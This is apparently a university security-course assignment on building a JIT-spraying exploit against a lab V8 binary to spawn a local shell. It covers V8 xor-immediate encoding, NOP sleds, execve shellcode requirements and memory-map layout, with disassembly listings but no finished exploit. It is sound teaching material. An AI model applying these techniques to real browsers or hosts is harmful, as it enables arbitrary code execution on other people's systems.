Project #4, JIT Spraying

Due: Monday, March 5th, 11:59 PM


The goal of this project is to craft a JIT-spraying exploit.

All work in this project must be done on the VirtualBox virtual machine provided on the course website; see below for information about this environment. Note: This is not the same VM we used for the previous projects!

The project VM includes a pp4 binary (installed in /home/user/bin) that contains a JavaScript JIT. The pp4 program takes a JavaScript filename as a command-line parameter. It compiles and runs the JavaScript code in that file. Whereas JavaScript running in a Web browser would have access to the DOM API for interacting with the outside world, JavaScript run by pp4 has access to just three functions beyond the JavaScript core. These are:

Your task is to write a JavaScript file that will execute a JIT spray, call exploit with the address of some sprayed code, and then get a local shell.


Get the boxv8 virtual machine, BoxV8.ova (warning: 500 MB!) Again, this is not the same VM we used in the previous projects.

As usual, the VM has accounts root/root and user/user. You can expect to do all your work as user.

You can work locally on the VM, or you can SSH in. If you want to SSH in, run the following command as root on the VM: apt-get install openssh-server. The VM should already be configured to expose port 22 on port 1274 of the host, but you can confirm that this is the case by looking at the port forwarding dialog reachable in the VM’s network configuration tab. Once you have installed the SSH server on the VM, you should be able to SSH in using a command like “ssh user@localhost -p 1274”. You can also save yourself some typing by adding the following to your ~/.ssh/config file:

Host boxv8
    HostName localhost
    Port 1274
    User user

Once you have added that directive to your SSH config, you can SSH into the VM with just “ssh boxv8”.

Getting started

The JavaScript JIT powering target is Google’s v8 which is used in Google Chrome. The JIT is lazy in the sense that when it sees a new function to compile, it will not actually compile it until the first time it is executed. Thus, it is not sufficient to create a function, you actually need to call it before it will JIT the code.

function payload(x)
	var y = x ^
		/* JIT spray code */;
	return y;

Starting off the JIT spray code by xoring the variable x also seems to prevent V8 from optimizing the whole expression into a constant.

The first thing you should try doing is including some additional literal values in the spray function and looking at the code that is produced.

For example, try putting into the above code the following expression:

	var y = x ^
		0x2 ^
		0x4 ^
		0x8 ^
		0x10 ^
		0x20 ^
		0x40 ^

The pp4 target binary comes with an additional feature: it can print out the JITted code by passing the -p command line option. Note: This option is only designed to help you in the creation of your exploit. We will not be testing your code with this option.

If we run ~/bin/pp4 -p sploit.js on the above code, we see the sequence of xors:

0x22307c59    57  83f104         xor ecx,0x4
0x22307c5c    60  83f108         xor ecx,0x8
0x22307c5f    63  83f110         xor ecx,0x10
0x22307c62    66  83f120         xor ecx,0x20
0x22307c65    69  83f140         xor ecx,0x40
0x22307c68    72  81f180000000   xor ecx,0x80
0x22307c6e    78  81f154ab0000   xor ecx,0xab54

The first column is the address where the code was JITted (but notice that it will change each time you run this so your values are likely different from mine), the second is the offset into the function, the third is the actual bytes that make up the instruction, the fourth is the x86 instructions produced.

Notice that it has modified the value that is to be xored! This is a consequence of how V8 encodes integer values internally, as discussed in section. This has two implications you will need to keep in mind:

  1. The constants you include in your JavaScript payload will need to be different from the bytes you want to appear in the JITted code, to account for the change V8 will apply; and
  2. Some instructions will not be usable in some places in the output stream, because their binary representation will require an odd byte where V8 forces an even byte.

Also notice that V8 is using two different forms of xor instruction. For small values, it uses an instruction that takes a one-byte immediate value (in Intel notation, imm8). For large values, it uses an instruction that takes a four-byte immediate value (in Intel notation imm32). You’re going to be using large values so the second is the only one that matters here.

There is one more restriction you will need to keep in mind. The second form, with imm32, is used only when the constant being xored is smaller than 0x40000000. If you try to xor an integer larger than 0x3fffffff, the generated code is not nearly as compact. Fortunately, that will not be an issue if you use cmp al as your chaining instruction as it has opcode 3c.

Infuriatingly, V8 here is using ecx as the accumulator register for the xors instead of eax, and it’s generating instructions that take two bytes in addition to the immediate, instead of the one-byte instructions for eax we considered in lecture. That’s okay; when you define your payload function using new Function (and invoke that function enough times to get it inlined) you will see xors that use eax.

For example, here is a version of the JavaScript above invoked through the function constructor:

var fstr = `
  var y = x ^
          0x1 ^
	  0x2 ^
	  0x4 ^
	  0x8 ^
	  0x10 ^
	  0x20 ^
	  0x40 ^
  return y`;

var f = new Function("x", fstr);

var i;
for (i = 0; i < /* SUFFICIENTLY MANY ITERATIONS */ ; i++) f(0);

With the placeholder comment replaced by a sufficiently large number to induce inlining, this produces assembly that looks like what we saw above, but with eax:

0x54688488    40  83f002         xor eax,0x2
0x5468848b    43  83f004         xor eax,0x4
0x5468848e    46  83f008         xor eax,0x8
0x54688491    49  83f010         xor eax,0x10
0x54688494    52  83f020         xor eax,0x20
0x54688497    55  83f040         xor eax,0x40
0x5468849a    58  3580000000     xor eax,0x80
0x5468849f    63  3554ab0000     xor eax,0xab54

Your most important deliverable is a JavaScript file called sploit.js. When ~/bin/pp4 sploit.js is run, the result should be a local shell:

user@boxv8:~/pp4$ ~/bin/pp4 sploit.js
$ echo hello
$ exit

To do that, you’re going to need to write some shell code. Take a look at Aleph One’s code from the reading. Essentially, you need to arrange for eax to have value 11, ebx to point to the string “/bin/sh”, ecx to point to the argv array and edx to point to the environ array. You can construct the string and the arrays on the stack. Unlike Aleph One, you don’t need to avoid zero bytes, making your job a little easier.

Finally, since where the compiled code for a function is placed each time is random, you’re going to need to JIT a bunch of copies of your payload function. This is easiest if you include your payload function in your exploit JavaScript inside a string, then use new Function to create multiple functions with that code. (Note that if you use this strategy, you may need to call the lambda you get multiple times before V8 bothers to compile the code the way you want.) Try to make your exploit as reliable as possible but it’s okay if pp4 crashes the first few times we try to run it.


You will submit the following files:

  1. README: Your README file should describe how your (or similar) script works, how your shell code works, and how your JIT spray works.

  2. GROUP: Your project ID and your partner’s (if you worked with one), in the same format as for previous projects

  3. shellcode.s: Shellcode (in the format of example.s) which you will run your modified (or similar) script on to produce your JavaScript.

  4. Your modified (or comparable script) that turns your shellcode.s into JavaScript.

  5. sploit.js: Your JavaScript file that obtains a shell when executed by pp4.

We should be able to run your exploits by running:

user@boxv8:~/pp4$ ~/bin/pp4 sploit.js

It may take a few attempts to work correctly due to the randomness, but try to make it as robust as you can (see below).

Developing and testing your exploit

Trying to write x86 instructions in binary by hand is needlessly painful. You should instead develop and test shellcode using assembly, then translate the binary, assembled version of that shellcode into constants suitable for including in a JavaScript exploit.

To assist in the creation of your exploit, we have provided a Bash script. It takes as an argument an assembly file (see example.s) and produces the encoding of the instructions it contains:

user@boxv8:~/pp$ ./ example.s
b1 08	mov    cl,0x8
b0 64	mov    al,0x64
d3 e0	shl    eax,cl
b0 63	mov    al,0x63
d3 e0	shl    eax,cl
b0 62	mov    al,0x62
d3 e0	shl    eax,cl
b0 61	mov    al,0x61
50	push   eax

This script is already useful, because it shows you the bytes that the assembler produces when it assembles your .s file. For example, shifting the eax register left by the number in the cl register (which, remember, is a name for the least significant 8 bits of the ecx register) turns out to be the two-byte instruction with hex encoding d3 e0.

We strongly encourage you to modify the script, or write a wrapper for it in a scripting language you prefer (both Python and Perl are installed on your VM), to produce the sequence of constants to include in your JavaScript payload. This will be much easier to get right than doing it by hand! For example, Stephen Checkoway (who developed this project) wrote a version of the script that produces output of the form:

user@boxv8:~/pp4$ ./ example.s
		0x1e0458c8 ^ // mov    cl,0x8
		0x1e325848 ^ // mov    al,0x64
		0x1e7069c8 ^ // shl    eax,cl

If you’ve written what you think should work as shellcode, you can test it without getting V8 involved, by turning it into a binary and running it. That binary should give you a shell. To get you started, here is an example program that can be assembled (note the boilerplate at the beginning):

	.intel_syntax noprefix
	.globl	_start
	mov	eax, 4
	mov	ebx, 1
	lea	ecx, message
	mov	edx, 13
	int	0x80

	xor	ebx, ebx
	mov	eax, 1
	int	0x80
	.ascii	"Hello, world\n"

Here is how to assemble and run it:

user@boxv8:~/pp4$ as foo.s -o foo.o
user@boxv8:~/pp4$ ld foo.o -o foo
user@boxv8:~/pp4$ ./foo
Hello, world

Note that the lines that start with a period contain assembler directives, and the lines that end with a colon are assembler labels. Your shellcode isn't being assembled by an assembler, so you will not be able to use any such directives in your shellcode. In particular this means that you can’t rely on having the string “/bin/sh” in data memory somewhere and will instead need to include instructions in your shellcode that place that string on the stack so you can later refer to it as an offset from the stack pointer, %esp.

Instruction set and system call references

You can find a useful system call reference at The system call you will need to invoke is execve.

You can, of course, get the current manuals directly from Intel. However, those cover x86-64, AMD’s 64-bit extension of x86, as well as 32-bit x86, so they are extremely long.

Yale’s operating systems class has a nice collection of 32-bit x86 resources, including cached copies of what Intel’s manuals looked like 10 years ago, when they were almost manageably short, and what they looked like 30 years ago, when they fit in a single printed book.

Another nice, more compact reference is maintained by MazeGen at That site includes compact listings of instructions alphabetically by mnemonic and by opcode. It also has excellent explanations of ModR/M byte encodings and of SIB byte encodings.

Making the exploit robust

To make the exploit robust, you’re going to want to take a few actions to reduce the amount of randomness you have to deal with.

First, you want to make the code you’re spraying pretty large and most of that is going to be filled with a JITted NOP sled. For some reason, functions that are too large do not behave the way we want with the series of xors. So experiment using -p to get a sense of how many NOPs you can insert before you lose the chained xors.

Notice that the JITted output contains both unoptimized code where each xor takes 13 bytes of code

0x53887879   185  90             nop
0x5388787a   186  50             push eax
0x5388787b   187  b854ab0000     mov eax,0xab54
0x53887880   192  5a             pop edx
0x53887881   193  e87af3e0cd     call 0x21696c00             ;; code: BINARY_OP_IC UNINITIALIZED (id = 21)

whereas the optimized version consists of a single instruction like

0x53887e41    97  81f154ab0000   xor ecx,0xab54

What this means is that even discounting the fixed beginnings and endings of your JITted functions, most of your JITted code is not usable. Worse still, even if you jump into the middle of the optimized code, there’s still a chance you’ll land on an xor rather than in one of the NOP bytes. But that’s not all! The JIT also produces a lot of extra data that isn’t executable.

Linux exposes information about a process’s address space using the /proc file system. A process can get information about its own address space by reading /proc/self/maps. As an example, here’s what the cat process’s address space looks like.

user@boxv8:~/pp4$ cat /proc/self/maps 
08048000-08054000 r-xp 00000000 08:01 1775       /bin/cat
08054000-08055000 r--p 0000b000 08:01 1775       /bin/cat
08055000-08056000 rw-p 0000c000 08:01 1775       /bin/cat
08bfc000-08c1d000 rw-p 00000000 00:00 0          [heap]
b7406000-b7428000 rw-p 00000000 00:00 0 
b7428000-b75b1000 r--p 00000000 08:01 1626       /usr/lib/locale/locale-archive
b75b1000-b75b2000 rw-p 00000000 00:00 0 
b75b2000-b7759000 r-xp 00000000 08:01 16260      /lib/i386-linux-gnu/i686/cmov/
b7759000-b775b000 r--p 001a7000 08:01 16260      /lib/i386-linux-gnu/i686/cmov/
b775b000-b775c000 rw-p 001a9000 08:01 16260      /lib/i386-linux-gnu/i686/cmov/
b775c000-b775f000 rw-p 00000000 00:00 0 
b7765000-b7767000 rw-p 00000000 00:00 0 
b7767000-b7768000 r-xp 00000000 00:00 0          [vdso]
b7768000-b776a000 r--p 00000000 00:00 0          [vvar]
b776a000-b7789000 r-xp 00000000 08:01 3173       /lib/i386-linux-gnu/
b7789000-b778a000 r--p 0001f000 08:01 3173       /lib/i386-linux-gnu/
b778a000-b778b000 rw-p 00020000 08:01 3173       /lib/i386-linux-gnu/
bffb9000-bffda000 rw-p 00000000 00:00 0          [stack]

The first column gives the range of mapped addresses, the second column shows the permissions, and the final column shows the path of the file that’s mapped there. (See the proc man page for more details.) Notice that the process’s address space is laid out with the stack at the top, some libraries below that, then the heap and finally the binary itself.

When v8 is allocating memory, it performs a mmap for (up to) 1 MB at a randomized address. See the OS::GetRandomMmapAddr() function for details. Essentially, it tries to allocate memory in the range 0x20000000 to 0x60000000.

Let’s take a look at what that looks like. The pp4 binary has another command line flag -m which will print out the processes address space just prior to jumping to the address specified by the exploit function.

Let’s take a look at that by running ~/bin/pp4 -m a.js where a.js contains just the exploit function.

user@boxv8:~/pp4$ cat a.js 
user@boxv8:~/pp4$ ~/bin/pp4 -m a.js 
2b500000-2b580000 rw-p 00000000 00:00 0 
2f100000-2f105000 rw-p 00000000 00:00 0 
2f105000-2f106000 ---p 00000000 00:00 0 
2f106000-2f14e000 rwxp 00000000 00:00 0 
2f14e000-2f180000 ---p 00000000 00:00 0 
36180000-36185000 rw-p 00000000 00:00 0 
36185000-36186000 ---p 00000000 00:00 0 
36186000-36187000 rwxp 00000000 00:00 0 
36187000-361b0000 ---p 00000000 00:00 0 
366d8000-366dc000 rw-p 00000000 00:00 0 
366dc000-366de000 ---p 00000000 00:00 0 
3b580000-3b5bd000 rw-p 00000000 00:00 0 
3b5bd000-3b600000 ---p 00000000 00:00 0 
3ed00000-3ed80000 rw-p 00000000 00:00 0 
40c00000-40c05000 rw-p 00000000 00:00 0 
40c05000-40c06000 ---p 00000000 00:00 0 
40c06000-40c7f000 rwxp 00000000 00:00 0 
40c7f000-40c80000 ---p 00000000 00:00 0 
41a80000-41a85000 rw-p 00000000 00:00 0 
41a85000-41a86000 ---p 00000000 00:00 0 
41a86000-41a87000 rwxp 00000000 00:00 0 
41a87000-41ab0000 ---p 00000000 00:00 0 
49b10000-49b11000 r-xp 00000000 00:00 0 
4d780000-4d785000 rw-p 00000000 00:00 0 
4d785000-4d786000 ---p 00000000 00:00 0 
4d786000-4d7ff000 rwxp 00000000 00:00 0 
4d7ff000-4d800000 ---p 00000000 00:00 0 
4f3b6000-4f7b6000 ---p 00000000 00:00 0 
55100000-55106000 rw-p 00000000 00:00 0 
55106000-55180000 ---p 00000000 00:00 0 
5ba80000-5ba85000 rw-p 00000000 00:00 0 
5ba85000-5ba86000 ---p 00000000 00:00 0 
5ba86000-5ba87000 rwxp 00000000 00:00 0 
5ba87000-5bab0000 ---p 00000000 00:00 0 
5ec80000-5ed00000 rw-p 00000000 00:00 0 
5f080000-5f100000 rw-p 00000000 00:00 0 
80036000-80b3c000 r-xp 00000000 08:01 77         /home/user/bin/pp4
80b3d000-80b66000 r--p 00b06000 08:01 77         /home/user/bin/pp4
80b66000-80b6a000 rw-p 00b2f000 08:01 77         /home/user/bin/pp4
80b6a000-80b75000 rw-p 00000000 00:00 0 
81e5f000-81ec8000 rw-p 00000000 00:00 0          [heap]
b60e7000-b60e8000 ---p 00000000 00:00 0 
b60e8000-b73d7000 rw-p 00000000 00:00 0          [stack:2123]
b73d7000-b757e000 r-xp 00000000 08:01 16260      /lib/i386-linux-gnu/i686/cmov/
b757e000-b7580000 r--p 001a7000 08:01 16260      /lib/i386-linux-gnu/i686/cmov/
b7580000-b7581000 rw-p 001a9000 08:01 16260      /lib/i386-linux-gnu/i686/cmov/
b7581000-b7584000 rw-p 00000000 00:00 0 
b7584000-b75a0000 r-xp 00000000 08:01 913        /lib/i386-linux-gnu/
b75a0000-b75a1000 rw-p 0001b000 08:01 913        /lib/i386-linux-gnu/

b75a1000-b75e5000 r-xp 00000000 08:01 16264      /lib/i386-linux-gnu/i686/cmov/
b75e5000-b75e6000 r--p 00043000 08:01 16264      /lib/i386-linux-gnu/i686/cmov/
b75e6000-b75e7000 rw-p 00044000 08:01 16264      /lib/i386-linux-gnu/i686/cmov/
b75e7000-b76cd000 r-xp 00000000 08:01 8955       /usr/lib/i386-linux-gnu/
b76cd000-b76d1000 r--p 000e6000 08:01 8955       /usr/lib/i386-linux-gnu/
b76d1000-b76d2000 rw-p 000ea000 08:01 8955       /usr/lib/i386-linux-gnu/
b76d2000-b76da000 rw-p 00000000 00:00 0 
b76da000-b76e1000 r-xp 00000000 08:01 16275      /lib/i386-linux-gnu/i686/cmov/
b76e1000-b76e2000 r--p 00006000 08:01 16275      /lib/i386-linux-gnu/i686/cmov/
b76e2000-b76e3000 rw-p 00007000 08:01 16275      /lib/i386-linux-gnu/i686/cmov/
b76e3000-b76fb000 r-xp 00000000 08:01 16256      /lib/i386-linux-gnu/i686/cmov/
b76fb000-b76fc000 r--p 00017000 08:01 16256      /lib/i386-linux-gnu/i686/cmov/
b76fc000-b76fd000 rw-p 00018000 08:01 16256      /lib/i386-linux-gnu/i686/cmov/
b76fd000-b76ff000 rw-p 00000000 00:00 0 
b7704000-b7707000 rw-p 00000000 00:00 0 
b7707000-b7708000 r-xp 00000000 00:00 0          [vdso]
b7708000-b770a000 r--p 00000000 00:00 0          [vvar]
b770a000-b7729000 r-xp 00000000 08:01 3173       /lib/i386-linux-gnu/
b7729000-b772a000 r--p 0001f000 08:01 3173       /lib/i386-linux-gnu/
b772a000-b772b000 rw-p 00020000 08:01 3173       /lib/i386-linux-gnu/
bfcb1000-bfcd2000 rw-p 00000000 00:00 0          [stack]
Segmentation fault

There’s a lot to see there and it’s easy to miss what’s important. Notice that a lot of the heap memory actually comes in 512 KB-aligned chunks. E.g.,

2b500000-2b580000 rw-p 00000000 00:00 0 

Even more interesting are the executable regions. Every piece of JITted code comes in a chunk that looks like this.

2f100000-2f105000 rw-p 00000000 00:00 0 
2f105000-2f106000 ---p 00000000 00:00 0 
2f106000-2f14e000 rwxp 00000000 00:00 0 
2f14e000-2f180000 ---p 00000000 00:00 0 

It starts with 0x5000 bytes of nonexecutable data, one guard page — which cannot be read, written, or executed — the actual executable code, and then the remainder of the chunk reserved but not accessible.

You’re going to be writing a whole lot of data so it’s going to look more like this, with just a single guard page left at the end of a chunk:

29100000-29105000 rw-p 00000000 00:00 0 
29105000-29106000 ---p 00000000 00:00 0 
29106000-2917f000 rwxp 00000000 00:00 0 
2917f000-29180000 ---p 00000000 00:00 0 

In a real JIT spraying attack, you would need to guess the location of a 512 KB executable chunk; typically, attackers will JIT enough functions that some address range in memory will contain a chunk with high probability, based on quirks in the allocation policy under memory constraints.

For this project, we’ll save you having to do this. Instead, you can call the function hint. The first time this function is called, it will return an integer representing the base address of one V8 executable chunk, chosen at random. (Assuming that there are at least three JIT executable mappings, which should always be the case.) On subsequent calls it will return zero.

If you want to have a clearer sense of how the values returned by hint relate to the memory map you get by running the pp4 binary with the -m flag, you can run the pp4 binary with the -a flag. When run this way, pp4 changes the behavior of the hint function so that it returns an array of all JIT executable mappings, rather than just one entry of that array chosen at random. Note that we will not be running the pp4 binary with the -a flag when we test your exploit, so you should code your exploit to work with the default rather than the -a behavior of hint.


This project is based on Project 3 from Johns Hopkins’s CS 460, Software Vulnerability Analysis. Thanks to Stephen Checkoway.

Navigation: CSE // CSE 127 // Project 4